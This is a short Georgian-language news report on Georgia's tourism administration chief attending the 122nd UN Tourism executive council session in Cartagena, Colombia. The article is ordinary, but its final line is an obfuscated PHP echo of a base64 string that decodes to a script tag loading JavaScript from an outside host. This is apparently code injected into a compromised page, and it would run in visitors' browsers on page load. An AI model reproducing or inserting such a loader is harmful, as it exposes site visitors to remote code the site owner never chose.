celsiusi
ავერსი საქკაბელი

 საქართველოს ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელი მაია ომიაძე კოლუმბიაში, კარტახენაში გაერო-ს ტურიზმის ორგანიზაციის აღმასრულებელი საბჭოს მიმდინარე სხდომას ესწრება.

122-ე საბჭოს სხდომა გაერო-ს ტურიზმის ორგანიზაციის გენერალურმა მდივანმა, ზურაბ პოლოლიკაშვილმა გახსნა.

ღონისძიებას ესწრებიან გაერო-ს ტურიზმის ორგანიზაციის წევრი ქვეყნების ტურიზმის მინისტრები და სახელმწიფო სტრუქტურების წარმომადგენლები, საბჭოს სხდომის ფარგლებში ტარდება თემატური სადისკუსიო პანელები, სადაც ორგანიზაციის მიმდინარე და შემდგომი საქმიანობა განიხილება.

საბჭოს სხდომას ესწრება ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელის პირველი მოადგილე თამარ ყორიაული.

ღონისძიების ფარგლებში თემატური სადისკუსიო პანელები ტარდება, სადაც საქართველოს დელეგაცია მონაწილეობს, განიხილება ტურიზმის ინდუსტრიაში მიმდინარე ტრენდები, ზრდის დინამიკა და სხვა მნიშვნელოვანი ინიციატივები.

122-ე საბჭოს სხდომის ფარგლებში ტურიზმის გლობალური ინვესტიციებისა და ინოვაციების ფორუმი გაიმართა, სადაც სხვადასხვა ქვეყნის დელეგაციებს საშუალება ჰქონდათ, მიღწევების შესახებ გამოცდილება გაეზიარებინათ.

ინფორმაციას ტურიზმის ეროვნული ადმინისტრაციის პრესსამსახური ავრცელებს.

107
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");